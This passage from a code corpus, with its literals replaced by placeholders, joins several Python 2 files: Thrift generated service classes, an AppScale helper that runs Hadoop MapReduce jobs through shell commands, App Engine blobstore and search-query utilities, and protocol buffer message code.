fid ) = iprot . readFieldBegin ( ) <EOL> if ftype == TType . STOP : <EOL> break <EOL> if fid == <NUM_LIT:1> : <EOL> if ftype == TType . STRING : <EOL> self . store = iprot . readString ( ) ; <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> elif fid == <NUM_LIT:2> : <EOL> if ftype == TType . STRING : <EOL> self . key = iprot . readString ( ) ; <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> elif fid == <NUM_LIT:3> : <EOL> if ftype == TType . STRING : <EOL> self . value = iprot . readString ( ) ; <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> iprot . readFieldEnd ( ) <EOL> iprot . readStructEnd ( ) <EOL> def write ( self , oprot ) : <EOL> if oprot . __class__ == TBinaryProtocol . TBinaryProtocolAccelerated and self . thrift_spec is not None and fastbinary is not None : <EOL> oprot . trans . write ( fastbinary . encode_binary ( self , ( self . __class__ , self . thrift_spec ) ) ) <EOL> return <EOL> oprot . writeStructBegin ( '<STR_LIT>' ) <EOL> if self . store != None : <EOL> oprot . writeFieldBegin ( '<STR_LIT:store>' , TType . STRING , <NUM_LIT:1> ) <EOL> oprot . writeString ( self . store ) <EOL> oprot . writeFieldEnd ( ) <EOL> if self . key != None : <EOL> oprot . writeFieldBegin ( '<STR_LIT:key>' , TType . STRING , <NUM_LIT:2> ) <EOL> oprot . writeString ( self . key ) <EOL> oprot . writeFieldEnd ( ) <EOL> if self . value != None : <EOL> oprot . writeFieldBegin ( '<STR_LIT:value>' , TType . STRING , <NUM_LIT:3> ) <EOL> oprot . writeString ( self . value ) <EOL> oprot . writeFieldEnd ( ) <EOL> oprot . writeFieldStop ( ) <EOL> oprot . writeStructEnd ( ) <EOL> def __str__ ( self ) : <EOL> return str ( self . __dict__ ) <EOL> def __repr__ ( self ) : <EOL> return repr ( self . __dict__ ) <EOL> def __eq__ ( self , other ) : <EOL> return isinstance ( other , self . __class__ ) and self . __dict__ == other . __dict__ <EOL> def __ne__ ( self , other ) : <EOL> return not ( self == other ) <EOL> class put_result : <EOL> thrift_spec = ( <EOL> ) <EOL> def __init__ ( self , d = None ) : <EOL> pass <EOL> def read ( self , iprot ) : <EOL> if iprot . __class__ == TBinaryProtocol . TBinaryProtocolAccelerated and isinstance ( iprot . trans , TTransport . CReadableTransport ) and self . thrift_spec is not None and fastbinary is not None : <EOL> fastbinary . decode_binary ( self , iprot . trans , ( self . __class__ , self . thrift_spec ) ) <EOL> return <EOL> iprot . readStructBegin ( ) <EOL> while True : <EOL> ( fname , ftype , fid ) = iprot . readFieldBegin ( ) <EOL> if ftype == TType . STOP : <EOL> break <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> iprot . readFieldEnd ( ) <EOL> iprot . readStructEnd ( ) <EOL> def write ( self , oprot ) : <EOL> if oprot . __class__ == TBinaryProtocol . TBinaryProtocolAccelerated and self . thrift_spec is not None and fastbinary is not None : <EOL> oprot . trans . write ( fastbinary . encode_binary ( self , ( self . __class__ , self . thrift_spec ) ) ) <EOL> return <EOL> oprot . writeStructBegin ( '<STR_LIT>' ) <EOL> oprot . writeFieldStop ( ) <EOL> oprot . writeStructEnd ( ) <EOL> def __str__ ( self ) : <EOL> return str ( self . __dict__ ) <EOL> def __repr__ ( self ) : <EOL> return repr ( self . __dict__ ) <EOL> def __eq__ ( self , other ) : <EOL> return isinstance ( other , self . __class__ ) and self . __dict__ == other . __dict__ <EOL> def __ne__ ( self , other ) : <EOL> return not ( self == other ) <EOL> class remove_args : <EOL> thrift_spec = ( <EOL> None , <EOL> ( <NUM_LIT:1> , TType . STRING , '<STR_LIT:store>' , None , None , ) , <EOL> ( <NUM_LIT:2> , TType . STRING , '<STR_LIT:key>' , None , None , ) , <EOL> ) <EOL> def __init__ ( self , d = None ) : <EOL> self . store = None <EOL> self . key = None <EOL> if isinstance ( d , dict ) : <EOL> if '<STR_LIT:store>' in d : <EOL> self . store = d [ '<STR_LIT:store>' ] <EOL> if '<STR_LIT:key>' in d : <EOL> self . key = d [ '<STR_LIT:key>' ] <EOL> def read ( self , iprot ) : <EOL> if iprot . __class__ == TBinaryProtocol . TBinaryProtocolAccelerated and isinstance ( iprot . trans , TTransport . CReadableTransport ) and self . thrift_spec is not None and fastbinary is not None : <EOL> fastbinary . decode_binary ( self , iprot . trans , ( self . __class__ , self . thrift_spec ) ) <EOL> return <EOL> iprot . readStructBegin ( ) <EOL> while True : <EOL> ( fname , ftype , fid ) = iprot . readFieldBegin ( ) <EOL> if ftype == TType . STOP : <EOL> break <EOL> if fid == <NUM_LIT:1> : <EOL> if ftype == TType . STRING : <EOL> self . store = iprot . readString ( ) ; <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> elif fid == <NUM_LIT:2> : <EOL> if ftype == TType . STRING : <EOL> self . key = iprot . readString ( ) ; <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> iprot . readFieldEnd ( ) <EOL> iprot . readStructEnd ( ) <EOL> def write ( self , oprot ) : <EOL> if oprot . __class__ == TBinaryProtocol . TBinaryProtocolAccelerated and self . thrift_spec is not None and fastbinary is not None : <EOL> oprot . trans . write ( fastbinary . encode_binary ( self , ( self . __class__ , self . thrift_spec ) ) ) <EOL> return <EOL> oprot . writeStructBegin ( '<STR_LIT>' ) <EOL> if self . store != None : <EOL> oprot . writeFieldBegin ( '<STR_LIT:store>' , TType . STRING , <NUM_LIT:1> ) <EOL> oprot . writeString ( self . store ) <EOL> oprot . writeFieldEnd ( ) <EOL> if self . key != None : <EOL> oprot . writeFieldBegin ( '<STR_LIT:key>' , TType . STRING , <NUM_LIT:2> ) <EOL> oprot . writeString ( self . key ) <EOL> oprot . writeFieldEnd ( ) <EOL> oprot . writeFieldStop ( ) <EOL> oprot . writeStructEnd ( ) <EOL> def __str__ ( self ) : <EOL> return str ( self . __dict__ ) <EOL> def __repr__ ( self ) : <EOL> return repr ( self . __dict__ ) <EOL> def __eq__ ( self , other ) : <EOL> return isinstance ( other , self . __class__ ) and self . __dict__ == other . __dict__ <EOL> def __ne__ ( self , other ) : <EOL> return not ( self == other ) <EOL> class remove_result : <EOL> thrift_spec = ( <EOL> ) <EOL> def __init__ ( self , d = None ) : <EOL> pass <EOL> def read ( self , iprot ) : <EOL> if iprot . __class__ == TBinaryProtocol . TBinaryProtocolAccelerated and isinstance ( iprot . trans , TTransport . CReadableTransport ) and self . thrift_spec is not None and fastbinary is not None : <EOL> fastbinary . decode_binary ( self , iprot . trans , ( self . __class__ , self . thrift_spec ) ) <EOL> return <EOL> iprot . readStructBegin ( ) <EOL> while True : <EOL> ( fname , ftype , fid ) = iprot . readFieldBegin ( ) <EOL> if ftype == TType . STOP : <EOL> break <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> iprot . readFieldEnd ( ) <EOL> iprot . readStructEnd ( ) <EOL> def write ( self , oprot ) : <EOL> if oprot . __class__ == TBinaryProtocol . TBinaryProtocolAccelerated and self . thrift_spec is not None and fastbinary is not None : <EOL> oprot . trans . write ( fastbinary . encode_binary ( self , ( self . __class__ , self . thrift_spec ) ) ) <EOL> return <EOL> oprot . writeStructBegin ( '<STR_LIT>' ) <EOL> oprot . writeFieldStop ( ) <EOL> oprot . writeStructEnd ( ) <EOL> def __str__ ( self ) : <EOL> return str ( self . __dict__ ) <EOL> def __repr__ ( self ) : <EOL> return repr ( self . __dict__ ) <EOL> def __eq__ ( self , other ) : <EOL> return isinstance ( other , self . __class__ ) and self . __dict__ == other . __dict__ <EOL> def __ne__ ( self , other ) : <EOL> return not ( self == other ) </s>
<s> import os <EOL> import re <EOL> import sys <EOL> import time <EOL> import urllib <EOL> import yaml <EOL> from google . appengine . api import users <EOL> APPSCALE_HOME = os . environ . get ( "<STR_LIT>" ) <EOL> HADOOP_VER = "<STR_LIT>" <EOL> HADOOP_HOME = APPSCALE_HOME + "<STR_LIT>" + HADOOP_VER + "<STR_LIT:/>" <EOL> HADOOP_BIN = APPSCALE_HOME + "<STR_LIT>" + HADOOP_VER + "<STR_LIT>" <EOL> HADOOP_STREAMING = HADOOP_HOME + "<STR_LIT>" + HADOOP_VER + "<STR_LIT>" <EOL> DBS_W_HADOOP = [ "<STR_LIT>" , "<STR_LIT>" ] <EOL> class MapReduceException ( Exception ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> """<STR_LIT>""" <EOL> def can_run_jobs ( ) : <EOL> """<STR_LIT>""" <EOL> stream = file ( "<STR_LIT>" , '<STR_LIT:r>' ) <EOL> contents = yaml . load ( stream ) <EOL> try : <EOL> database = contents [ '<STR_LIT>' ] <EOL> if database in DBS_W_HADOOP : <EOL> return True <EOL> else : <EOL> return False <EOL> except KeyError : <EOL> return False <EOL> def get_lang ( filename ) : <EOL> """<STR_LIT>""" <EOL> supportedExtensions = { <EOL> "<STR_LIT:rb>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> } <EOL> try : <EOL> extension = filename . split ( "<STR_LIT:.>" ) [ - <NUM_LIT:1> ] <EOL> lang = supportedExtensions [ extension ] <EOL> return lang <EOL> except : <EOL> raise MapReduceException ( "<STR_LIT>" % extension ) <EOL> def ensure_user_is_mapreduce_authorized ( ) : <EOL> """<STR_LIT>""" <EOL> if not users . is_current_user_capable ( "<STR_LIT>" ) : <EOL> raise MapReduceException ( "<STR_LIT>" ) <EOL> def write_temp_file ( suffix , data ) : <EOL> """<STR_LIT>""" <EOL> ensure_user_is_mapreduce_authorized ( ) <EOL> suffix = urllib . unquote ( suffix ) <EOL> regex = r"<STR_LIT>" <EOL> pattern = re . compile ( regex ) <EOL> suffix = pattern . sub ( '<STR_LIT>' , suffix ) <EOL> fileLoc = "<STR_LIT>" + suffix <EOL> f = open ( fileLoc , "<STR_LIT>" ) <EOL> f . write ( data ) <EOL> f . close ( ) <EOL> return fileLoc <EOL> def get_all_ips ( ) : <EOL> """<STR_LIT>""" <EOL> ensure_user_is_mapreduce_authorized ( ) <EOL> all_ips = [ ] <EOL> fileLoc = "<STR_LIT>" <EOL> if os . path . exists ( fileLoc ) : <EOL> f = open ( fileLoc ) <EOL> text = f . read ( ) <EOL> all_ips = text . split ( "<STR_LIT:\n>" ) <EOL> return all_ips <EOL> def get_num_of_nodes ( ) : <EOL> """<STR_LIT>""" <EOL> ensure_user_is_mapreduce_authorized ( ) <EOL> num_of_nodes = <NUM_LIT:0> <EOL> fileLoc = "<STR_LIT>" <EOL> if os . path . exists ( fileLoc ) : <EOL> f = open ( fileLoc ) <EOL> num_of_nodes = int ( f . read ( ) ) <EOL> return num_of_nodes <EOL> def put_mr_input ( data , inputLoc ) : <EOL> """<STR_LIT>""" <EOL> ensure_user_is_mapreduce_authorized ( ) <EOL> inputLoc = urllib . unquote ( inputLoc ) <EOL> regex = r"<STR_LIT>" <EOL> pattern = re . compile ( regex ) <EOL> inputLoc = pattern . sub ( '<STR_LIT>' , inputLoc ) <EOL> fileLoc = "<STR_LIT>" + inputLoc <EOL> f = open ( fileLoc , "<STR_LIT>" ) <EOL> f . write ( data ) <EOL> f . close ( ) <EOL> removeInput = HADOOP_BIN + "<STR_LIT>" + inputLoc <EOL> sys . stderr . write ( removeInput + "<STR_LIT:\n>" ) <EOL> os . system ( removeInput ) <EOL> put = HADOOP_BIN + "<STR_LIT>" + fileLoc + "<STR_LIT:U+0020>" + inputLoc <EOL> os . system ( put ) <EOL> def run_mr_job ( mapper , reducer , inputLoc , outputLoc , config = { } ) : <EOL> """<STR_LIT>""" <EOL> ensure_user_is_mapreduce_authorized ( ) <EOL> mapper = urllib . unquote ( mapper ) <EOL> reducer = urllib . unquote ( reducer ) <EOL> inputLoc = urllib . unquote ( inputLoc ) <EOL> outputLoc = urllib . unquote ( outputLoc ) <EOL> regex = r"<STR_LIT>" <EOL> pattern = re . compile ( regex ) <EOL> mydir = os . getcwd ( ) + "<STR_LIT:/>" <EOL> mapper = "<STR_LIT>" + getLang ( mapper ) + "<STR_LIT:U+0020>" + mydir + pattern . sub ( '<STR_LIT>' , mapper ) + "<STR_LIT>" <EOL> reducer = "<STR_LIT>" + getLang ( reducer ) + "<STR_LIT:U+0020>" + mydir + pattern . sub ( '<STR_LIT>' , reducer ) + "<STR_LIT>" <EOL> inputLoc = pattern . sub ( '<STR_LIT>' , inputLoc ) <EOL> outputLoc = pattern . sub ( '<STR_LIT>' , outputLoc ) <EOL> removeOutput = HADOOP_BIN + "<STR_LIT>" + outputLoc <EOL> sys . stderr . write ( removeOutput + "<STR_LIT:\n>" ) <EOL> os . system ( removeOutput ) <EOL> formattedConfig = "<STR_LIT>" <EOL> for key in config : <EOL> formattedConfig = formattedConfig + "<STR_LIT>" + key + "<STR_LIT:=>" + config [ key ] <EOL> command = HADOOP_BIN + "<STR_LIT>" + HADOOP_STREAMING + "<STR_LIT:U+0020>" + formattedConfig + "<STR_LIT>" + inputLoc + "<STR_LIT>" + outputLoc + "<STR_LIT>" + mapper + "<STR_LIT>" + reducer <EOL> sys . stderr . write ( "<STR_LIT:\n>" + command + "<STR_LIT:\n>" ) <EOL> start = time . time ( ) <EOL> os . system ( command ) <EOL> end = time . time ( ) <EOL> sys . stderr . write ( "<STR_LIT>" + str ( end - start ) + "<STR_LIT>" ) <EOL> def get_mr_output ( outputLoc ) : <EOL> """<STR_LIT>""" <EOL> ensure_user_is_mapreduce_authorized ( ) <EOL> outputLoc = urllib . unquote ( outputLoc ) <EOL> regex = r"<STR_LIT>" <EOL> pattern = re . compile ( regex ) <EOL> outputLoc = pattern . sub ( '<STR_LIT>' , outputLoc ) <EOL> fileLoc = "<STR_LIT>" + outputLoc <EOL> rmr = "<STR_LIT>" + fileLoc <EOL> os . system ( rmr ) <EOL> get = HADOOP_BIN + "<STR_LIT>" + outputLoc + "<STR_LIT:U+0020>" + fileLoc <EOL> os . system ( get ) <EOL> if os . path . exists ( fileLoc ) : <EOL> cmd = "<STR_LIT>" + fileLoc + "<STR_LIT>" <EOL> return os . popen ( cmd ) . read ( ) <EOL> else : <EOL> raise MapReduceException ( "<STR_LIT>" ) <EOL> def get_mr_logs ( outputLoc ) : <EOL> """<STR_LIT>""" <EOL> ensure_user_is_mapreduce_authorized ( ) <EOL> outputLoc = urllib . unquote ( outputLoc ) <EOL> regex = r"<STR_LIT>" <EOL> pattern = re . compile ( regex ) <EOL> outputLoc = pattern . sub ( '<STR_LIT>' , outputLoc ) <EOL> fileLoc = "<STR_LIT>" + outputLoc <EOL> rmr = "<STR_LIT>" + fileLoc <EOL> os . system ( rmr ) <EOL> get = HADOOP_BIN + "<STR_LIT>" + outputLoc + "<STR_LIT:U+0020>" + fileLoc <EOL> os . system ( get ) <EOL> if os . path . exists ( fileLoc ) : <EOL> cmd = "<STR_LIT>" + fileLoc + "<STR_LIT>" <EOL> return os . popen ( cmd ) . read ( ) <EOL> else : <EOL> raise MapReduceException ( "<STR_LIT>" % outputLoc ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import with_statement <EOL> __all__ = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> import urllib <EOL> from google . appengine . api . files import file as files <EOL> from google . appengine . api import datastore <EOL> from google . appengine . ext import blobstore <EOL> _BLOBSTORE_FILESYSTEM = '<STR_LIT>' <EOL> _BLOBSTORE_DIRECTORY = '<STR_LIT:/>' + _BLOBSTORE_FILESYSTEM + '<STR_LIT:/>' <EOL> _BLOBSTORE_NEW_FILE_NAME = '<STR_LIT>' <EOL> _CREATION_HANDLE_PREFIX = '<STR_LIT>' <EOL> _MIME_TYPE_PARAMETER = '<STR_LIT>' <EOL> _BLOBINFO_UPLOADED_FILENAME_PARAMETER = '<STR_LIT>' <EOL> def create ( mime_type = '<STR_LIT>' , <EOL> _blobinfo_uploaded_filename = None ) : <EOL> """<STR_LIT>""" <EOL> if not mime_type : <EOL> raise files . InvalidArgumentError ( '<STR_LIT>' ) <EOL> if not isinstance ( mime_type , basestring ) : <EOL> raise files . InvalidArgumentError ( '<STR_LIT>' ) <EOL> params = { _MIME_TYPE_PARAMETER : mime_type } <EOL> if _blobinfo_uploaded_filename : <EOL> if not isinstance ( _blobinfo_uploaded_filename , basestring ) : <EOL> raise files . InvalidArgumentError ( <EOL> '<STR_LIT>' ) <EOL> params [ _BLOBINFO_UPLOADED_FILENAME_PARAMETER ] = _blobinfo_uploaded_filename <EOL> return files . _create ( _BLOBSTORE_FILESYSTEM , params = params ) <EOL> _BLOB_FILE_INDEX_KIND = '<STR_LIT>' <EOL> _BLOB_KEY_PROPERTY_NAME = '<STR_LIT>' <EOL> def get_blob_key ( create_file_name ) : <EOL> """<STR_LIT>""" <EOL> if not create_file_name : <EOL> raise files . InvalidArgumentError ( '<STR_LIT>' ) <EOL> if not isinstance ( create_file_name , basestring ) : <EOL> raise files . InvalidArgumentError ( '<STR_LIT>' ) <EOL> if not create_file_name . startswith ( _BLOBSTORE_DIRECTORY ) : <EOL> raise files . InvalidFileNameError ( <EOL> '<STR_LIT>' % <EOL> ( create_file_name , _BLOBSTORE_DIRECTORY ) ) <EOL> ticket = create_file_name [ len ( _BLOBSTORE_DIRECTORY ) : ] <EOL> if not ticket . startswith ( _CREATION_HANDLE_PREFIX ) : <EOL> return blobstore . BlobKey ( ticket ) <EOL> blob_file_index = datastore . Get ( [ datastore . Key . from_path ( <EOL> _BLOB_FILE_INDEX_KIND , <EOL> ticket ) ] ) [ <NUM_LIT:0> ] <EOL> if blob_file_index : <EOL> blob_key_str = blob_file_index [ _BLOB_KEY_PROPERTY_NAME ] <EOL> results = datastore . Get ( [ datastore . Key . from_path ( <EOL> blobstore . BLOB_INFO_KIND , blob_key_str ) ] ) <EOL> if results [ <NUM_LIT:0> ] is None : <EOL> return None <EOL> else : <EOL> query = datastore . Query ( blobstore . BLOB_INFO_KIND , <EOL> { '<STR_LIT>' : ticket } , <EOL> keys_only = True , <EOL> namespace = '<STR_LIT>' ) <EOL> results = query . Get ( <NUM_LIT:1> ) <EOL> if not results : <EOL> return None <EOL> blob_key_str = results [ <NUM_LIT:0> ] . name ( ) <EOL> return blobstore . BlobKey ( blob_key_str ) <EOL> def get_file_name ( blob_key ) : <EOL> """<STR_LIT>""" <EOL> if not blob_key : <EOL> raise files . InvalidArgumentError ( '<STR_LIT>' ) <EOL> if not isinstance ( blob_key , ( blobstore . BlobKey , basestring ) ) : <EOL> raise files . InvalidArgumentError ( '<STR_LIT>' ) <EOL> return '<STR_LIT>' % ( _BLOBSTORE_DIRECTORY , blob_key ) <EOL> def _delete ( filename ) : <EOL> """<STR_LIT>""" <EOL> blob_key = get_blob_key ( filename ) <EOL> if blob_key is None : <EOL> return <EOL> blob_info = blobstore . BlobInfo . get ( blob_key ) <EOL> if blob_info is None : <EOL> return <EOL> blob_info . delete ( ) </s>
<s> """<STR_LIT>""" <EOL> from google . appengine . _internal import antlr3 <EOL> from google . appengine . api . search import QueryLexer <EOL> from google . appengine . api . search import QueryParser <EOL> class QueryException ( Exception ) : <EOL> """<STR_LIT>""" <EOL> class QueryLexerWithErrors ( QueryLexer . QueryLexer ) : <EOL> """<STR_LIT>""" <EOL> def emitErrorMessage ( self , msg ) : <EOL> """<STR_LIT>""" <EOL> raise QueryException ( msg ) <EOL> class QueryParserWithErrors ( QueryParser . QueryParser ) : <EOL> """<STR_LIT>""" <EOL> def emitErrorMessage ( self , msg ) : <EOL> """<STR_LIT>""" <EOL> raise QueryException ( msg ) <EOL> def CreateParser ( query ) : <EOL> """<STR_LIT>""" <EOL> input_string = antlr3 . ANTLRStringStream ( query ) <EOL> lexer = QueryLexerWithErrors ( input_string ) <EOL> tokens = antlr3 . CommonTokenStream ( lexer ) <EOL> parser = QueryParserWithErrors ( tokens ) <EOL> return parser <EOL> def Parse ( query ) : <EOL> """<STR_LIT>""" <EOL> parser = CreateParser ( query ) <EOL> try : <EOL> return parser . query ( ) <EOL> except Exception , e : <EOL> raise QueryException ( e . message ) <EOL> def Simplify ( parser_return ) : <EOL> """<STR_LIT>""" <EOL> if parser_return . tree : <EOL> return _SimplifyNode ( parser_return . tree ) <EOL> return parser_return <EOL> def _SimplifyNode ( node ) : <EOL> """<STR_LIT>""" <EOL> if not node . getType ( ) : <EOL> return _SimplifyNode ( node . children [ <NUM_LIT:0> ] ) <EOL> elif node . getType ( ) is QueryParser . CONJUNCTION and node . getChildCount ( ) is <NUM_LIT:1> : <EOL> return _SimplifyNode ( node . children [ <NUM_LIT:0> ] ) <EOL> elif node . getType ( ) is QueryParser . DISJUNCTION and node . getChildCount ( ) is <NUM_LIT:1> : <EOL> return _SimplifyNode ( node . children [ <NUM_LIT:0> ] ) <EOL> elif ( node . getType ( ) is QueryParser . RESTRICTION and node . getChildCount ( ) is <NUM_LIT:2> <EOL> and node . children [ <NUM_LIT:0> ] . getType ( ) is QueryParser . GLOBAL ) : <EOL> return _SimplifyNode ( node . children [ <NUM_LIT:1> ] ) <EOL> elif ( node . getType ( ) is QueryParser . VALUE and node . getChildCount ( ) is <NUM_LIT:2> and <EOL> ( node . children [ <NUM_LIT:0> ] . getType ( ) is QueryParser . WORD or <EOL> node . children [ <NUM_LIT:0> ] . getType ( ) is QueryParser . STRING or <EOL> node . children [ <NUM_LIT:0> ] . getType ( ) is QueryParser . NUMBER ) ) : <EOL> return _SimplifyNode ( node . children [ <NUM_LIT:1> ] ) <EOL> elif ( ( node . getType ( ) is QueryParser . EQ or node . getType ( ) is QueryParser . HAS ) <EOL> and node . getChildCount ( ) is <NUM_LIT:1> ) : <EOL> return _SimplifyNode ( node . children [ <NUM_LIT:0> ] ) <EOL> for i , child in enumerate ( node . children ) : <EOL> node . setChild ( i , _SimplifyNode ( child ) ) <EOL> return node </s>
<s> from google . net . proto import ProtocolBuffer <EOL> import array <EOL> import dummy_thread as thread <EOL> __pychecker__ = """<STR_LIT>""" <EOL> if hasattr ( ProtocolBuffer , '<STR_LIT>' ) : <EOL> _extension_runtime = True <EOL> _ExtendableProtocolMessage = ProtocolBuffer . ExtendableProtocolMessage <EOL> else : <EOL> _extension_runtime = False <EOL> _ExtendableProtocolMessage = ProtocolBuffer . ProtocolMessage <EOL> class FieldValue ( ProtocolBuffer . ProtocolMessage ) : <EOL> TEXT = <NUM_LIT:0> <EOL> HTML = <NUM_LIT:1> <EOL> ATOM = <NUM_LIT:2> <EOL> DATE = <NUM_LIT:3> <EOL> NUMBER = <NUM_LIT:4> <EOL> _ContentType_NAMES = { <EOL> <NUM_LIT:0> : "<STR_LIT>" , <EOL> <NUM_LIT:1> : "<STR_LIT>" , <EOL> <NUM_LIT:2> : "<STR_LIT>" , <EOL> <NUM_LIT:3> : "<STR_LIT>" , <EOL> <NUM_LIT:4> : "<STR_LIT>" , <EOL> } <EOL> def ContentType_Name ( cls , x ) : return cls . _ContentType_NAMES . get ( x , "<STR_LIT>" ) <EOL> ContentType_Name = classmethod ( ContentType_Name ) <EOL> has_type_ = <NUM_LIT:0> <EOL> type_ = <NUM_LIT:0> <EOL> has_language_ = <NUM_LIT:0> <EOL> language_ = "<STR_LIT>" <EOL> has_string_value_ = <NUM_LIT:0> <EOL> string_value_ = "<STR_LIT>" <EOL> def __init__ ( self , contents = None ) : <EOL> if contents is not None : self . MergeFromString ( contents ) <EOL> def type ( self ) : return self . type_ <EOL> def set_type ( self , x ) : <EOL> self . has_type_ = <NUM_LIT:1> <EOL> self . type_ = x <EOL> def clear_type ( self ) : <EOL> if self . has_type_ : <EOL> self . has_type_ = <NUM_LIT:0> <EOL> self . type_ = <NUM_LIT:0> <EOL> def has_type ( self ) : return self . has_type_ <EOL> def language ( self ) : return self . language_ <EOL> def set_language ( self , x ) : <EOL> self . has_language_ = <NUM_LIT:1> <EOL> self . language_ = x <EOL> def clear_language ( self ) : <EOL> if self . has_language_ : <EOL> self . has_language_ = <NUM_LIT:0> <EOL> self . language_ = "<STR_LIT>" <EOL> def has_language ( self ) : return self . has_language_ <EOL> def string_value ( self ) : return self . string_value_ <EOL> def set_string_value ( self , x ) : <EOL> self . has_string_value_ = <NUM_LIT:1> <EOL> self . string_value_ = x <EOL> def clear_string_value ( self ) : <EOL> if self . has_string_value_ : <EOL> self . has_string_value_ = <NUM_LIT:0> <EOL> self . string_value_ = "<STR_LIT>" <EOL> def has_string_value ( self ) : return self . has_string_value_ <EOL> def MergeFrom ( self , x ) : <EOL> assert x is not self <EOL> if ( x . has_type ( ) ) : self . set_type ( x . type ( ) ) <EOL> if ( x . has_language ( ) ) : self . set_language ( x . language ( ) ) <EOL> if ( x . has_string_value ( ) ) : self . set_string_value ( x . string_value ( ) ) <EOL> def Equals ( self , x ) : <EOL> if x is self : return <NUM_LIT:1> <EOL> if self . has_type_ != x . has_type_ : return <NUM_LIT:0> <EOL> if self . has_type_ and self . type_ != x . type_ : return <NUM_LIT:0> <EOL> if self . has_language_ != x . has_language_ : return <NUM_LIT:0> <EOL> if self . has_language_ and self . language_ != x . language_ : return <NUM_LIT:0> <EOL> if self . has_string_value_ != x . has_string_value_ : return <NUM_LIT:0> <EOL> if self . has_string_value_ and self . string_value_ != x . string_value_ : return <NUM_LIT:0> <EOL> return <NUM_LIT:1> <EOL> def IsInitialized ( self , debug_strs = None ) : <EOL> initialized = <NUM_LIT:1> <EOL> return initialized <EOL> def ByteSize ( self ) : <EOL> n = <NUM_LIT:0> <EOL> if ( self . has_type_ ) : n += <NUM_LIT:1> + self . lengthVarInt64 ( self . type_ ) <EOL> if ( self . has_language_ ) : n += <NUM_LIT:1> + self . lengthString ( len ( self . language_ ) ) <EOL> if ( self . has_string_value_ ) : n += <NUM_LIT:1> + self . lengthString ( len ( self . string_value_ ) ) <EOL> return n <EOL> def ByteSizePartial ( self ) : <EOL> n = <NUM_LIT:0> <EOL> if ( self . has_type_ ) : n += <NUM_LIT:1> + self . lengthVarInt64 ( self . type_ ) <EOL> if ( self . has_language_ ) : n += <NUM_LIT:1> + self . lengthString ( len ( self . language_ ) ) <EOL> if ( self . has_string_value_ ) : n += <NUM_LIT:1> + self . lengthString ( len ( self . string_value_ ) ) <EOL> return n <EOL> def Clear ( self ) : <EOL> self . clear_type ( ) <EOL> self . clear_language ( ) <EOL> self . clear_string_value ( ) <EOL> def OutputUnchecked ( self , out ) : <EOL> if ( self . has_type_ ) : <EOL> out . putVarInt32 ( <NUM_LIT:8> ) <EOL> out . putVarInt32 ( self . type_ ) <EOL> if ( self . has_language_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putPrefixedString ( self . language_ ) <EOL> if ( self . has_string_value_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putPrefixedString ( self . string_value_ ) <EOL> def OutputPartial ( self , out ) : <EOL> if ( self . has_type_ ) : <EOL> out . putVarInt32 ( <NUM_LIT:8> ) <EOL> out . putVarInt32 ( self . type_ ) <EOL> if ( self . has_language_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putPrefixedString ( self . language_ ) <EOL> if ( self . has_string_value_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putPrefixedString ( self . string_value_ ) <EOL> def TryMerge ( self , d ) : <EOL> while d . avail ( ) > <NUM_LIT:0> : <EOL> tt = d . getVarInt32 ( ) <EOL> if tt == <NUM_LIT:8> : <EOL> self . set_type ( d . getVarInt32 ( ) ) <EOL> continue <EOL> if tt == <NUM_LIT> : <EOL> self . set_language ( d . getPrefixedString ( ) ) <EOL> continue <EOL> if tt == <NUM_LIT> : <EOL> self . set_string_value ( d . getPrefixedString ( ) ) <EOL> continue <EOL> if ( tt == <NUM_LIT:0> ) : raise ProtocolBuffer . ProtocolBufferDecodeError <EOL> d . skipData ( tt ) <EOL> def __str__ ( self , prefix = "<STR_LIT>" , printElemNumber = <NUM_LIT:0> ) : <EOL> res = "<STR_LIT>" <EOL> if self . has_type_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatInt32 ( self . type_ ) ) <EOL> if self . has_language_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatString ( self . language_ ) ) <EOL> if self . has_string_value_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatString ( self . string_value_ ) ) <EOL> return res <EOL> def _BuildTagLookupTable ( sparse , maxtag , default = None ) : <EOL> return tuple ( [ sparse . get ( i , default ) for i in xrange ( <NUM_LIT:0> , <NUM_LIT:1> + maxtag ) ] ) <EOL> ktype = <NUM_LIT:1> <EOL> klanguage = <NUM_LIT:2> <EOL> kstring_value = <NUM_LIT:3> <EOL> _TEXT = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : "<STR_LIT>" , <EOL> <NUM_LIT:1> : "<STR_LIT:type>" , <EOL> <NUM_LIT:2> : "<STR_LIT>" , <EOL> <NUM_LIT:3> : "<STR_LIT>" , <EOL> } , <NUM_LIT:3> ) <EOL> _TYPES = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : ProtocolBuffer . Encoder . NUMERIC , <EOL> <NUM_LIT:1> : ProtocolBuffer . Encoder . NUMERIC , <EOL> <NUM_LIT:2> : ProtocolBuffer . Encoder . STRING , <EOL> <NUM_LIT:3> : ProtocolBuffer . Encoder . STRING , <EOL> } , <NUM_LIT:3> , ProtocolBuffer . Encoder . MAX_TYPE ) <EOL> _STYLE = """<STR_LIT>""" <EOL> _STYLE_CONTENT_TYPE = """<STR_LIT>""" <EOL> _PROTO_DESCRIPTOR_NAME = '<STR_LIT>' <EOL> class Field ( ProtocolBuffer . ProtocolMessage ) : <EOL> has_name_ = <NUM_LIT:0> <EOL> name_ = "<STR_LIT>" <EOL> has_value_ = <NUM_LIT:0> <EOL> def __init__ ( self , contents = None ) : <EOL> self . 